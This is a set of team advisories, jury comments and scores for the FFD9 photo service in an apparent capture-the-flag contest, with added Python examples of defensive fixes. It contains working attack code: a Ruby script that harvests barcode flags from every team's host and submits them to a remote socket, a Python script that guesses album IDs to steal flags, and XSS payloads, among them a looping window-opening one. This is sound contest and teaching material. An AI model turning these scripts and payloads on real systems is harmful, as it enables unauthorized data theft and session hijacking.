FFD9 Advisories
Service: FFD9
Text: FFD9
vuln: you can load ANY files from your FS, they can be shells on perl
tell me please how 2 use it =)
solution: check the signature
Jury comment: Plz, prove this and get patch and exploit
Score: 0/10 points

Service: FFD9
Text: you can find pictures similar to flag which are barcodes.
exploit: get one picture of flag (barcode) and search it. Will get several new pictures, decode them -> get flags.
Jury comment: Yes. Please get patch and code of exploit.
Score: 2/5 points

Service: FFD9
Text: part of exploit:
require 'watir'      # added: the script drives a browser through Watir (the www object); assumes the watir gem
require 'net/http'
require 'socket'

$myteam = 0          # placeholder: your own team number (not in the original fragment)
www = Watir::Browser.new

for team in 1..99 do
  next if team == $myteam
  begin
    www.goto "http://10.23.#{team}.3"
    www.file_field(:name, "searh_image").set "D:\\1.png"   # upload one known flag picture
    www.text_field(:id, "magick_input").set "-30"          # similarity threshold
    www.image(:id, "find_image").click
    # collect the paths of the "similar" images the search returned
    images_ar = www.html.scan(/IMG alt="" src="(\/photo\/[^"]*)" width=400/m).flatten
    otvets_ar = []
    images_ar.each { |im|
      Net::HTTP.start("10.23.#{team}.3") { |http|
        resp = http.get("#{im}.png")
        open("flags/#{im.gsub('/', '')}.png", "wb") { |file|
          file.write(resp.body)
        }
        # decode the barcode in the downloaded picture with zbarimg
        n_a = `C:\\Program Files\\ZBar\\bin\\zbarimg.exe -d -q -D D:\\coding\\ructfe2011\\flags\\#{im.gsub('/', '')}.png`
        otvets_ar.push n_a.gsub('CODE-128:', '')
      }
      puts otvets_ar
      # hand the decoded flags to the checksystem
      t = TCPSocket.new('10.23.41.162', 31337)
      t.gets
      t.puts otvets_ar.join(' ')
      ttt = t.gets
      puts ttt
      t.close
    }
  rescue
    puts "error #{team}"
  end
end
Jury comment: Cool, but patch is not available for now
Score: 2/5 points

Service: FFD9
Text: patch is to cut off similar photos from the search output. file find.html.ep
Jury comment: It breaks service functionality
Score: 0/5 points

Service: FFD9
Text: patch for similar photos:
add private => 0 in find_one function. File FFD9DB.pm, line 198
Jury comment: Ok
Score: 1/5 points

Service: FFD9
Text: Album IDs are predictable from user IDs:
The game server submits flags to FFD9 as album titles. It does this by creating a new user and subsequently creating a new album. If you know the user ID (i.e. by using the URL http://10.23.?.3/users/), you only have to increment the ID by 1 in order to get a valid album ID. By using http://10.23.?.3/user/album/<aid> you can then determine the name of that album and hence capture the flag.
Resolution:
Instead of using the mongodb ObjectID as the (secret) id of albums, generate an actual random number and use that one as the key to identify albums. (Requires some coding.)
An easier resolution is to just resolve the http://10.23.?.3/users/ weakness. User IDs are still drawn deterministically but that way album IDs become much harder to guess.
Jury comment: Yes, please provide patch for full points
Score: 5/8 points

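Why the increment works and what the proposed resolution changes, as an added Python example (not code from the FFD9 service, which is written in Perl): an ObjectId is a timestamp, a machine id, a process id and a per-process counter, so an album created right after its user by the same process differs only in the counter, whereas a random token carries none of that structure. The ids are the ones quoted in the FluxFingers advisory further down; the function names are assumed here.

```python
import secrets
from datetime import datetime, timezone


def parse_object_id(oid_hex):
    """Split a 24-hex-digit mongodb ObjectId into its fields.
    Classic layout: 4-byte UNIX timestamp, 3-byte machine id, 2-byte
    process id, 3-byte counter that goes up by one per id created in
    that process."""
    raw = bytes.fromhex(oid_hex)
    if len(raw) != 12:
        raise ValueError("ObjectId must be 12 bytes")
    ts = int.from_bytes(raw[0:4], "big")
    return {
        "timestamp": ts,
        "created": datetime.fromtimestamp(ts, timezone.utc),
        "machine": raw[4:7].hex(),
        "pid": int.from_bytes(raw[7:9], "big"),
        "counter": int.from_bytes(raw[9:12], "big"),
    }


def guess_next_id(oid_hex):
    """The advisory's trick: treat the id as one number and add one.
    It hits only when user and album were created by the same process
    within the same second, which is exactly what the checker does."""
    return "%024x" % (int(oid_hex, 16) + 1)


def new_album_id():
    """Proposed resolution: a 96-bit random token instead of an ObjectId.
    Same length, but no timestamp, no counter, nothing to extrapolate."""
    return secrets.token_hex(12)


def is_guessable(user_id, album_id):
    """True when the album id is the plain successor of the user id."""
    return guess_next_id(user_id) == album_id


# Constructed from the ids quoted on this page: user ...0003, album ...0004.
USER_ID = "4ec7c9283a1171b201000003"
ALBUM_ID = "4ec7c9283a1171b201000004"

if __name__ == "__main__":
    print(parse_object_id(USER_ID))
    print(is_guessable(USER_ID, ALBUM_ID), is_guessable(USER_ID, new_album_id()))
```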
Service: FFD9
Text:
------------------------------ [[ FluxFingers ]] ------------------------------
--[ Description ]--------------------------------------------------------------
It is possible to read the flags from the album.
--[ Patch ]--------------------------------------------------------------------
/public/js/index.js
Line: 61
Change:
$(s).appendTo('#users');
to
$(z).appendTo('#users');
--[ Exploit ]------------------------------------------------------------------
1. Get the User Id, which is in the link on your index (like <a href="/user/4ec7c9283a1171b201000003">chnmvwvfzvjr</a>)
the user id is 4ec7c9283a1171b201000003
2. Increment this to 4ec7c9283a1171b201000004
3. Call http://$ip/user/album/4ec7c9283a1171b201000004
4. Get the flag :) (it's like: Name: FHT0S596XY2P438GUYOH7TDZDKF6PRX=)
Jury comment: Yes, but exploit already posted. And this patch doesn't work in all cases. (http://ip/users)
Score: 1/8 points

Service: FFD9
Text: Exploit for getting flags from non-patched service
import re
import sys
import urllib2

regexp = r"\w{24}"   # a 24-hex-digit mongodb ObjectId (user id)
flag = r"\w{31}="    # flag format: 31 word characters followed by '='
d = urllib2.urlopen(url=sys.argv[1] + "/users", timeout=20)
s = d.read()
uids = re.findall(regexp, s)
for uid in uids[-20:]:
    aid = int(uid, 16) + 1   # album id = user id + 1
    try:
        al = urllib2.urlopen(url=sys.argv[1] + ("/user/album/%x" % aid), timeout=5)
        for f in re.findall(flag, al.read()):
            print f
    except urllib2.HTTPError:
        pass
    except urllib2.URLError:
        pass
Jury comment: Already posted by other team
Score: 0/8 points

Service: FFD9
Text: You can see all user ids by going to url http://10.23.x.y/users
Jury comment: Ok
Score: 1/1 point

Service: FFD9
Text: login to system with credentials admin : admin - get access to site
Jury comment: It is test user. Not a bug.
Score: 0/1 points

Service: FFD9
Text: You can log in as admin with username 'admin' pass 'admin' after service starts
Jury comment: It is test user. Not a bug.
Score: 0/1 points

Service: FFD9
Text: db collection has 'admin':'admin' entry
Jury comment: It is test user. Not a bug.
Score: 0/1 points

Service: FFD9
Text: FFD9, which runs on Port 80 of the VulnBox, has a default username / password pair of admin:admin
To fix:
Connect to the database for ffd9:
    mongo ffd0
Generate a new password:
    echo -n "F00" | md5sum
Change the admin password:
    db.users.update({name:"admin"}, {$set:{pass: "MD5SUM"}})
Jury comment: It is not a bug. It is test user.
Score: 0/1 points

Service: FFD9
Text: default pass for admin is admin
Jury comment: Yes. It is not bug. It is test user
Score: 0/1 points

Service: FFD9
Text: using 10.23.%teamAddr%.%battlePort% you can get users, there are user ids. using user id you can connect as http://10.23.48.133/user/%userId%
close it by .htaccess
Jury comment: plz, prove it
Score: 0/5 points

Service: FFD9
Text: It's possible to extract all currently stored flags (decoded barcodes from uploaded images) by using the find feature.
Since the value of the magick_input field is not properly sanitized one can provide arbitrarily large values (>30).
Due to this all images are considered similar to the one uploaded (See javascript code in FFD9DB.pm[search function])
This can be easily prevented by sanitizing the supplied value:
var m = <%= $m %>;
if (m > 30) {
    m = 30;
}
var n = <%= $n %> + m;
...
Jury comment: this does not fix vuln. also not exploit.
Score: 2/10 points

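Server-side validation of the magick_input value, as an added Python example (the service itself is Perl; this is not its code): the JavaScript patch above caps only values above 30, while the Ruby exploit earlier on this page sets the field to -30, so the bound has to be two-sided, reject non-numeric input, and be applied before the value is interpolated into the template. Function names and the default are assumptions.

```python
def parse_threshold(raw, default=0, low=0, high=30):
    """Validate the similarity threshold the client sent.

    Returns an int clamped to [low, high]. Anything that is not an
    integer (empty, None, letters) falls back to `default` instead of
    being passed through to the template, where `var m = <%= $m %>;`
    would otherwise echo the raw value into JavaScript."""
    try:
        value = int(str(raw).strip())
    except (TypeError, ValueError):
        return default
    return max(low, min(high, value))


def search_window(n, raw_m):
    """Mirror of the template's `var n = <%= $n %> + m;` computed on the
    server with the validated threshold; n is the base score."""
    return n + parse_threshold(raw_m)


# Constructed inputs: the exploit's value, the ">30" case from the
# advisory, a normal value and junk.
SAMPLES = ["-30", "100", "15", "abc", ""]

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "->", parse_threshold(s), "window:", search_window(10, s))
```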
Service: FFD9
Text: "data.widht" - typo at file: index.js, str: 73
Jury comment: Yes ;). But it is not security bug.
Score: 0/1 points

Service: FFD9
Text: You can upload any file via admin upload. Parses only extension
Jury comment: No. You can not upload any file. Please prove it.
Score: 0/1 points

Service: FFD9
Text: You can upload any file with "image" extension, for example "JPG", via upload. Destination can be found via looking page source.
Jury comment: Yes, but it is not a security bug
Score: 0/1 points

Service: FFD9
Text: patching possibility of including files:
my ($x, $y, $z) = unpack("CCC", $String);
my $c = chr($x) . chr($y) . chr($z);
if ($c ne "\xFF\xD8\xFF") {   # JPEG SOI marker FF D8 FF ("яШя" when read as cp1251)
    # go home
}
for jpg files or smth like this
Jury comment: It's checked in other place
Score: 0/1 points

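The "check the signature" fix from the first advisory, carried through as an added Python example (not the service's own Perl code): accept an upload only when the extension is an image type and the bytes start with the matching magic (FF D8 FF for JPEG, ending in the FF D9 marker the service is named after; the 8-byte PNG signature for PNG). A Perl script renamed to .jpg, the "shell on perl" case, fails the content check regardless of its name. Function names and the sample blobs are constructed here.

```python
import os

# JPEG: starts with SOI (FF D8 FF), ends with EOI (FF D9).
# PNG: fixed 8-byte signature.
JPEG_SOI = b"\xff\xd8\xff"
JPEG_EOI = b"\xff\xd9"
PNG_SIG = b"\x89PNG\r\n\x1a\n"

ALLOWED = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png"}


def sniff_image(data):
    """Return 'jpeg', 'png' or None from the content, never from the name.
    The EOI check is strict; relax it if files with trailing data are common."""
    if data.startswith(JPEG_SOI) and data.endswith(JPEG_EOI):
        return "jpeg"
    if data.startswith(PNG_SIG):
        return "png"
    return None


def check_upload(filename, data):
    """Accept only if extension and content signature agree.
    Returns (accepted, reason_or_kind)."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    if ext not in ALLOWED:
        return False, "extension %r not allowed" % ext
    kind = sniff_image(data)
    if kind is None:
        return False, "no image signature found"
    if kind != ALLOWED[ext]:
        return False, "content is %s but extension says %s" % (kind, ext)
    return True, kind


# Constructed samples: a minimal JPEG-shaped blob, a PNG header, and a
# Perl script renamed to .jpg.
SAMPLE_JPEG = JPEG_SOI + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 16 + JPEG_EOI
SAMPLE_PNG = PNG_SIG + b"\x00\x00\x00\rIHDR" + b"\x00" * 17
SAMPLE_PERL = b"#!/usr/bin/perl\nprint 'not an image';\n"

if __name__ == "__main__":
    for name, blob in [("flag.jpg", SAMPLE_JPEG), ("flag.png", SAMPLE_PNG),
                       ("shell.jpg", SAMPLE_PERL), ("shell.pl", SAMPLE_PERL),
                       ("flag.jpg", SAMPLE_PNG)]:
        print(name, check_upload(name, blob))
```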
Service: FFD9
Text: ===== Team: My Little Pwnies ======================================
=== Number: 82 ====================================================
===== Time: 11/19/2011 @ 16:10 UTC =================================
-------------------------------------------------------------------
--- 1. Summary: ---------------------------------------------------
-------------------------------------------------------------------
The FFD9 service has XSS in the Album Name Field after the user logs in.
-------------------------------------------------------------------
--- 2. Description: -----------------------------------------------
-------------------------------------------------------------------
When entering an album name, malicious script can be entered to create reflective XSS in the album name.
Upon refreshing the page this is displayed with filtered characters.
-------------------------------------------------------------------
--- 3. Impact: ----------------------------------------------------
-------------------------------------------------------------------
Potentially allow an attacker to insert malicious page into a user's page thereby controlling their session thereafter or stealing cookies.
-------------------------------------------------------------------
--- 4. Affected Services: -----------------------------------------
-------------------------------------------------------------------
FFD9 Album name
-------------------------------------------------------------------
--- 5. Solution: --------------------------------------------------
-------------------------------------------------------------------
Filter characters such as [<>/&%();'"] and script tags.
-------------------------------------------------------------------
--- 6. Time Table: ------------------------------------------------
-------------------------------------------------------------------
11/19/2011 - 11:10am submitted
Jury comment: This only works for you and works only while creating a new album. Scripts are not executed when displaying a list of albums.
Score: 0/1 points

Service: FFD9
Text: album name is XSS vulnerable, put
<a href="#" onclick="now();function now() {for (i=1;i>0;i++){open('DieScript.htm','new'+i);}}">myname</a>
and get saaaad..
solution: use standard escape functions
Jury comment: This only works for you and works only while creating a new album. Scripts are not executed when displaying a list of albums.
Score: 0/1 points

Service: FFD9
Text:
Service: FFD9
Vulnerability: XSS
You can register new users and inject code over the username.
Exploit:
Register a user named "<iframe>". In the userlist the name is printed directly and an iframe appears.
Fix:
Use the Perl module HTML::Entities to fix this problem.
HTML::Entities::encode($text);
Jury comment: Ok
Score: 2/2 points

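The two fixes proposed on this page side by side, as an added Python example (the service's fix is HTML::Entities::encode in Perl; this is not its code): the character blacklist from the My Little Pwnies advisory versus output encoding at render time. Encoding shows every name verbatim as text and can never turn it into markup; the blacklist also neutralises the payloads but silently corrupts legitimate names. The sample names are the "<iframe>" username from this advisory, the URL-decoded form of the login payload further down, and one constructed legitimate name.

```python
import html
import re

# Blacklist quoted in the "Solution" section of the My Little Pwnies advisory.
BLACKLIST = re.compile(r"[<>/&%();'\"]")


def filter_name(name):
    """Strip-the-bad-characters approach: the stored value is altered
    and innocent input like an apostrophe disappears."""
    return BLACKLIST.sub("", name)


def encode_name(name):
    """Output encoding, the equivalent of HTML::Entities::encode($text):
    <, >, &, and both quote characters become entities at render time."""
    return html.escape(name, quote=True)


def render_user_list(names, render=encode_name):
    """Minimal stand-in for the service's user list markup."""
    items = "".join("<li>%s</li>" % render(n) for n in names)
    return '<ul id="users">%s</ul>' % items


# Constructed sample names (the first two are the payloads quoted on this page).
NAMES = ["<iframe>", "<img src=a onmouseover=alert(1)>", "O'Brien & Sons"]

if __name__ == "__main__":
    print(render_user_list(NAMES, filter_name))
    print(render_user_list(NAMES, encode_name))
```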
Service: FFD9
Text: ATTENTION: This advisory is similar to the old one but another form is vulnerable
Service: FFD9
Vulnerability: XSS
You can register new users and inject code over the username.
Exploit:
Create an album named "<iframe>". In the albumlist the name is printed directly and an iframe appears.
Fix:
Use the Perl module HTML::Entities to fix this problem.
HTML::Entities::encode($text);
Jury comment: Repeat.
Score: 0/2 points

Service: FFD9
Text: Cross site scripting vulnerability in username entry
Jury comment: Already posted
Score: 0/2 points

Service: FFD9
Text: 1) Description of Vulnerability
XSS
======================================================================
2) Exploit / PoC
Use:
asd6<img%20src%3da%20onmouseover%3dalert(1)>f8baa65cb68
for
http://10.23.XX.3/ - login function
======================================================================
3) Patch
avoid the usage of html encoding
======================================================================
Jury comment: Already posted
Score: 0/2 points

Service: FFD9
Text: XSS when registering a user can delete all content on the page, bringing the service down
Jury comment: Already posted.
Score: 0/2 points